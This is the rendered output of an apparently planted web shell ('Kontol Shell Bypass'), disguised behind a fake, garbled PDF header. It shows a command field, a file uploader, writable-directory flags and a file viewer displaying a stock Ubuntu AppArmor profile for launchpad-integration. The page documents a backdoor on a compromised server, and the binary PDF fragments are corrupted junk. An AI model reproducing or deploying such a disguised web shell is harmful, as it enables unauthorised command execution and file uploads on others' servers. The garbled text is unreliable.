%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /etc/apparmor.d/abstractions/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //etc/apparmor.d/abstractions/launchpad-integration
# vim:syntax=apparmor
# launchpad-integration

  # Launchpad integration should run in a sanitizing profile
  /usr/bin/launchpad-integration Cxr -> launchpad_integration,
  profile launchpad_integration {
    #include <abstractions/base>
    #include <abstractions/nameservice>
    #include <abstractions/ubuntu-browsers>

    # Required for debuggers
    capability sys_ptrace,

    # Run confined with security execution. sudo scrubs the environment, so we
    # don't have to
    /usr/bin/sudo Ux,

    # Give it wide permissions since it and apport need to do a lot
    /** rwlk,
    /{,usr/}{,s}bin/* Pixr,
    /{,usr/}lib*/{,**/}*.so{,.*} m,
    /usr/share/apport/* Pixr,

    # Dangerous files
    audit deny owner /**/*.py* r,       # python imports
    audit deny owner /**/* m,           # compiled libraries
  }


Kontol Shell Bypass